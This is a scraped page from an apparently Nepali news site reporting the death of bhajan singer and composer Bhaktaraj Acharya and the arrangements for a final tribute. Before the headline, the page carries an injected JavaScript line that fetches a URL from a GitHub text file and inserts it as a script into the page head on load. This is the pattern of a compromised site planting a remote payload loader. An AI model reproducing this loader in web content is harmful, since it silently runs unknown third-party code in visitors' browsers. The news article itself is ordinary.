;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); भजन शिरोमणि गायक तथा संगीतकार भक्तराज आचार्यको निधन, भोलि प्रज्ञा प्रतिष्ठान अन्तिम श्रदान्जली – जुनेली न्युज
सोमवार, बैशाख २, २०८२
  • होमपेज
  • भजन शिरोमणि गायक तथा संगीतकार भक्तराज आचार्यको निधन, भोलि प्रज्ञा प्रतिष्ठान अन्तिम श्रदान्जली
Breaking News

भजन शिरोमणि गायक तथा संगीतकार भक्तराज आचार्यको निधन, भोलि प्रज्ञा प्रतिष्ठान अन्तिम श्रदान्जली

काठमाडौं । सोमबार अपराह्न ललितपुरको मेडिसिटी अस्पताल लैजाने क्रममा वरिष्ठ गायक तथा संगीतकार भक्तराज आचार्यको निधन भएको छ ।

भजन शिरोमणिको उपाधिबाट समेत प्रसिद्ध ८२ वर्षीय आचार्य ३० वर्षदेखि दूध मात्रै खाएर बाँचिरहेको संगीतकार सापकोटाले बताए ।
संगीतकार हरि लम्सालका अनुसार अपराह्न साढे ४ बजेतिर अचानक अक्सिजन लेभल कम भएपछि छोरा स्वरुपराज र लम्सालले उनलाई मेडिसिटी अस्पताल लैजाँदै गर्दा बाटोमै निधन भएको हो । गत दशैंमा लडेर उनको टाउकोमा चोट लागेको थियो ।

आचार्यको पार्थिव शरीरलाई मंगलबार बिहान ९ बजे संगीत तथा नाट्य प्रज्ञा प्रतिष्ठानको परिसरमा अन्तिम श्रद्धाञ्जलीका लागि राखिने भएको छ । राष्ट्रिय सम्मानका साथ उनको बिदाइ गर्ने तयारी छ ।

 

फेसबुक प्रतिक्रियाहरु